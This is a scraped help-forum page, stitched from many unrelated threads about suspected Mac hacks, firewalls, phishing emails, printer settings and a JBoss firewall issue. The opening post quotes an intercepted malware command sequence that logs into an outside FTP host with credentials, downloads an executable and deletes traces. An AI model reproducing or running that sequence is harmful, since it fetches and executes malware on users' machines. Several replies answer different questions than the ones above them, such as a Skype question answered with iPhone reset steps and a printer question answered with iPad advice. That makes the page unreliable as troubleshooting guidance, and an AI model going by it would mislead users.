Possible firewall/spyware hack going on??

Hi there,
Can anyone help me? From time to time when I use my machine the keyboard seems to start typing things all on its own. If the cursor happens to be in a search field I can see what it is typing; otherwise the computer just beeps as it tries to make sense of keyboard inputs.
I have no idea if this is just a weird hardware thing going on, if I may have some spyware in my Mac (which is quite surprising) or someone is trying to hack my computer through an open port.
I managed to intercept some of the 'transmission' in TextEdit:
cho open ftp1.killyourself.info 21 .. ik 7echo user mysql database .. ik 7echo binary .. ik 7echo get winbackup16.exe .. ik 7echo bye .. ik 7ftp -n -v -s;ik 7del ik 7winbackup16.exe 7exit
So far it hasn't managed to do anything malicious, apart from maybe annoy me by typing randomly while I am trying to rename a file in iTunes and other things like that. Does anyone have any ideas what might be happening, and how to solve it?
Many thanks...
:-Joe

Wow. This sounds serious. You need to find this virus, kill it, and find out where it came from and lock down your computer. You can probably find it using Activity Monitor. If not, since it seems to be trying to get a exe file via ftp you can enter
lsof -i :21
in Terminal. Keep trying. You should catch it. Note the pid. Next
lsof -p pid
to see what files it has opened. (Enter the pid where I wrote pid)
In Activity Monitor, find the pid, inspect it, and note the parent process.
Back in Terminal, enter
kill -9 pid
At some point you might want to ask the registrant of killyourself.info

why some virus is trying to ftp to his site and download winbackup16.exe. Of course, he may have no idea what's going on. If so, he'd be interested to know that someone out there (including us now) know a username and password on his ftp server.
Report back with more info ASAP.

  • A Hacker going at my computer?

    Hello,
I think the following log indicates a hacker going at my computer, trying to gain access. Is that right?
I took off the repeats, because each attempt at a username had about five or six or seven tries in a row. And also, I separated each try from the others by one line space. See below for more information/questions...

It looks like this has been going on for a while, at least a month or more, according to what I see in the logs. I really don't look at the logs very much, but I thought I would give it a "look-see" and see "what hit me". And this is what I saw.
Most of the log stuff I can't figure out anyway. So, who knows what else is going on.
I had some problems, too -- reading the logs, because some of the logs (in this group of same log entries) locked me out, even though I am an administrator (and it's my computer) -- so I had to sign on as "root" to gain access (i.e., "view") that immediate logs. It's strange that some logs (of the same group) would allow me access and others said I didn't have access. I've done corrections on permissions many times, but it has never changed that peculiar behavior.
Anyone have any information on this one -- both weird things?
    Thanks

    Hi Star Traveler,
first, I am not a security expert and therefore, I can not really tell you what the logfile entries mean. But I would expect it would be helpfull for others if you told us more about the environment your computer is working in:
    1. What Mac OS X are you running (exact version and patchlevel, i.e. Security fixes, Quicktime etc.)?
    2. How is your computer connected to a network, local and/or internet?
    3. How else besides you can log into the computer as a user (and what role does the person have, i.e. admin, root, standard, restricted user)?
    4. Do you have the Open Firmware Password set (to prevent booting from CD or external media without proper authorization)?
Others might want to know more specific information, but that would surly help to know.
Regarding your question of being able to view logfiles: Apple seems to have changed the way logfiles are made available in 10.4. Now you have to have a certain role to view certain logs. This makes sense, since some contain sensitive data concerning your computer, like the firewall log, for instance. In the end, this should not concern you since you as the proper owner can still authorize as such and view everything.
BTW, I would deactivate root, if you do not absolutly need it - at least until you know what's going on. And you should only be working as a non-admin user for normal daily work, anyway ...
    Regards
    Jim

  • HT1507 I do not see a firewall tab when going to System Preferences Sharing?

I do not see a firewall tab when going to System Preferences>Sharing.
I am unable to make or receive iChat video calls.
Trying to figure out what is going on with my router.

    Hi,
    For others.
The Firewall is in System Preferences > Security > Firewall
There are then slight variances in Leopard and Snow Leopard/Lion about when you turn it ON and when you can access the Advanced Button
If it is set to ON then you need to go to the Advanced Button and Enable Allow Signed software
You may also need to add iChat (Or message beta) to the List.
    NOTE
Enabling Stealth will stop iChat/Messages from working.

  • Fake text message hack going around?

A few minutes ago I received, what appears to be, a fake text message.
My phone vibrated, I didn't grab for it right away. It vibrated again so I picked up and hit the Home button to turn the screen on. There was a popup that looked mostly like a normal text message.
I started reading it and it started with something like "Yesterday you sent me 3 text messages regarding our relationship...". I could see that the message was so long that it was running off the screen; so I slid to unlock so I could read the whole thing.
However, the message is not in the text messaging app anywhere. I don't believe it was an actual text message as it does not exist in the text messaging app. Also, the message looked slightly weird because I did not notice a name or number displayed and the entire message text was bold. Typically, the name is bold and the message text is normal.
My phone is not jailbroken and the only new applications I've downloaded recently are Google Places and Crock-Pot (recipe application).
Is there any word on an app or hack able to fake text messages going around? Is that even possible?

Well, I should probably change the title to "malicious," which is what I would file a notification from an app meant to look like a text message (or whatever this is) under.
I don't think it's of any harm to me; and I don't think the message is legit (meaning it's not from any friends, family or anyone else I know). I am curious, however, as to what caused it so I can be rid of the annoyance

  • Possible Email Virus/Hack?

I am running three gmail accounts on my Apple Mail and recently, when I reply to certain folks the email shows as being sent to me, comes to my inbox, but does not show as being sent to the intended recipient (even though they are receiving the emails). There is no BCC function turned on anywhere and I see no address in the BCC bar when I press Send. Also, every time I send an email or check for new mail, the Mail Activity bar on the bottom left always shows 2 incoming messages that never materialize (not even in Junk or Spam folders). Any ideas what could be going on? Thx

I cannot comment on the reply issue you mention without more information. Without some specific details, it's impossible to say whether this is normal or not. It could be an issue between GMail and Mail on Mavericks, if you're running Mavericks. If so, you may want to try updating to 10.9.2, if you haven't already, as that improves many aspects of Mail.
Regarding the inaccurate incoming mail count, one possibility is that you have Mavericks and haven't updated to 10.9.2 yet. There is a known issue with that count in Mail on 10.9 and 10.9.1.
Whatever the case, nothing you describe sounds at all like either malware or a hack.

  • Antivirus+Firewall+SpyWare Blockers- Needed?

    Hey Again,
So it's been a few months seen I began posting on these forums. So far, everyones been amazingly helpfull and great (I've treid to help people out too with the knowledge i gained-woot level 1 w/o a mac :P). After a few months of waiting, it's been confirmed my bonus is in the mail and should arrive anytime next week. So with the time of my mini purchase near, i've began to start burning my stuff onto cds and research the mac apps i'm planning to use.
Once again, I have come across a question:
Is antivirus, firewall or spyware blackers needed at all or recommended for OS X? Do you need all 3 or just a firewall, antivirus program etc.?
If so, what would you recommend? (Free would be best)
I know OS X does not have many viruses at all but I was wondering is there enough out there to need protection? or should i be fine w/o any protection.
    Thanks a lot, once again,
    Wannabe

Heh, Oh i know about taxes :P i'm expecting about as much as you described. I will still have enough for the mini though .
Anyways, yes i will defatnely be more susceptible to spyware on Windows XP, however that, like xp viruses should only affect the xp partition of my drive. Spyware like viruses can't jump partitions so what ever happens in XP stays in XP. As for the spyware/antivirus question i asked i seemed to have my own problem via a little research in the last hour. Looks like i'm going to get a AV program (Still deciding, but now i know whats out there). I won't need a firewall other the OS X one, (Only one is technally better and not much better so i'll stick with the free OS X firewall). And finally, as for spyware, i'm still looking for a mac based spyware remover (equivelant to Ad-Aware for windows). I'll keep looking.
Anyways thanks for the help ,
    Wannbe

  • Is it possible to get hacked by pressing on a link in a email that i got and am pretty sure was a hacker?

got an email from what looked like it was pay pal telling me that my payment to such and such has gone thru only prob was i didn't buy anything .. so i clicked on the item description to see what it was thinking maybe my husband got something... turns out he hasn't so i checked my pay pal a/c which seems to be fine .. no such invoice exists... so my question is ... did i open myself to a hacker by opening the link ??? how can i check my iMac ??
    thanks

Your iMac is pretty safe from Apple's Security as the experts here will tell you. However it is possible to get malware etc. but very unlikely. I have got similar e-mails from pay pal, UPS, Credit cards ( even got one from ez-paid tolls) etc. Be sure to never give them any personal information. Don't click on any attachment or open the emails for 100% security from these so call legal outfits. Always go direct to pay pal or others web site and sign in to check your account. These things are usually phishing for personal info and will not affect your iMac. If you had a Windows Machine you may very well get something from virus to malware. Of course we could all have troubles from the this stuff but your iMac is very safe. I have never gotten anything.

  • Is it possible to get hacked without doing anythin...

I'm apart of a forum, and within that forum there seems to be a lot of skype hackings which interfere with it's progressive development. Is it possible to get your skype hacked without anyone knowing the email of it and or adding others that send you maclicious files? How is it possible to get your skype hacked if these two problems are out of the equation and your computer is clean?

Unless your iPhone has been jailbroken there is nothing known that can attack the iOS...and be sure to download the latest iOS, 7.0.6 as that has security patches and SSL patches.
There can be browser pop-ups, but those are from the website and not things that can self-install on an iOS device.  They can be a scary thing to deal with, however.  Basically what you did is great...I would not bother with anything like Avast.  With an experience like that, double click the home button, dismiss all recent apps by swiping the material above the icon up and away, then reboot by holding both the power and home buttons until the apple logo appears.  Ignore the red slider if that appears.
Doing that stops all apps that could be running even in the background, clears all memory, and resets the iOS device.  No data or settings will be affected by doing that.

  • Is it possible to get hacked from safari on your Iphone

When I was browsing a site a white badge icon popped up and asked if I wanted to go to a site. Assuming that this was malicious I went to take safari off multitask. When I did that my screen went black w/the white apple logo and a few seconds later my normal locked screen appeared. When I went back into my phone I assumed it was a virus and cleared all the cookies/history from safari. After that I spent the next couple of hours downloading avast and resorting my phone. My only concerns are if they hacked me and stole any information from my phone (that being the reason I restored my phone). My question to you guys is has this ever happened to you guys and should I still be concerned? Its been a day and I'm still shaken up.

  • Special Standard printer only for acrobat reader, is this possible? Registry Hack

In my networking earea are a lot of printers also a big toshiba copying mashine.
While printing a pdf file to it with an PCL6 printer driver it takes a lot of time to print this.
When i take a Postscript driver it runs faster ...
so when my users will print pdf's it is difficult to explain them how to print ... an own standard printer for acrobat reader would solve this problem.
Does anyone have a solution? is there some registry hack?
    regards 2CV6

In Windows (don't know if this is the case on Mac) in a corporate environment where you are connected to printers via verbose network paths, you can't see the entire path.  The "printer name" gets truncated.  Since the name of the printer is at the right end of the path, you can't see which printer is which.
It would be handy if they had a function that allowed you to scroll to the right of the printer list and/or throw up a tool tip that gives the entire path.  I'm surprised this hasn't been flagged as a pretty significant issue.

Try this first - Reset the iPad by holding down on the Sleep and Home buttons at the same time for about 10-15 seconds until the Apple Logo appears - ignore the red slider - let go of the buttons. (This is equivalent to rebooting your computer.)
Or this - Delete the account in Mail and then set it up again. Settings->Mail, Contacts, Calendars -> Accounts   Tap on the Account, then on the red button that says Remove Account.

  • Do I need to keep my Webroot Firewall & Spyware software now that I have Mozilla Firefox?

Do I need to renew or purchase other security software if I have Mozilla Firefox loaded?
This is a new topic. Answer not found in Mozilla Knowledgebase.

You do need a firewall and anti-virus software when using any web browser, but there are some good free (for personal use) applications out there.

  • Possible firewall problem

    Hi,
I have SQL Developer in a lab that has a firewall blocking the access to the server.
The firewall was opened for the IP of database server and port 1521 (TCP).
Now I can do Telnet for the server on the IP and Port of the listener.
When I try to open a connection using SQL Developer with the correct IP and port, but using a wrong Service name, I get error ORA-12514, which indicates that SQL Developer could make contact with the listener.
But when I use the correct Service Name, I get "The network adapter could not establish the connection". It seems to me that there it needs some access that is still closed. Does any one know what are the ports that should be opened?
    Edited by: user492400 on Mar 31, 2010 2:45 PM

If your using WinXP SP2, that could be it.  Also, if it's the firewall, on your desktop you should see a shortcut NVIDIA Web-based Interface or go to http://localhost:3476/cgi-bin/ncgir.exe?menu/index.html in IE (use IE because other browsers have issues displaying the page properly).  Then go to the Firewall menu and configure it the way you want (Off or open the ports you need).

The router seems to be working great, but i did call at www.grc.com today to check if the routers firewall seemed to be working, it seemed to have stealthed all the ports fine (i assume it was my router) but failed the overall test as i got the following message.
Ping Reply: RECEIVED (FAILED) — Your system REPLIED to our Ping (ICMP Echo) requests, making it visible on the Internet. Most personal firewalls can be configured to block, drop, and ignore such ping requests in order to better hide systems from hackers. This is highly recommended since "Ping" is among the oldest and most common methods used to locate systems prior to further exploitation.
I have checked the routers settings and the firewall is ON, I wonder if anyone could help me ensure that my router doesn't respond to ping tests, many thanks

Hey buddy..lol, The Router is working great so far as i can tell but i have a problem accessing the log-in page to adjust settings i use http://tplinklogin.net and when i first boot up the router it seems to work fine for a while, then a few days later or even a few hours (there is no pattern) the router control panel become inaccessible a bit like a web page that doesn't exist.  A re-start of the router always makes it accessible (till next time it isn't !! )
I've tried various browsers so don't think its a browser issue, and the router seems to carry on working fine i wonder if you could help again?
    Many Thanks
    Andy

  • Possible firewall issue

I've installed jboss on a non-global zone and verified the installation using lynx from within the non-global zone.
I can't see jboss from the global xone, another non-global zone, or a different machine. I can ping back and forth between all zones and other machines as well as ssh into the non-global jboss zone to admin it.
I tried issuing 'svcadm disable ipfilter' on both the global zone and non-global zone. It worked on the global zone but not the jboss zone (got 'pattern doesn't match any instances' error).
I tried rebooting the jboss-zone after disabling ipfilter on the global zone and still can't get anything.
    Any ideas?

OK, just to test I started apache and it works as expected.
This must be a firewall issue. Does anyone know how to configure / diable it?
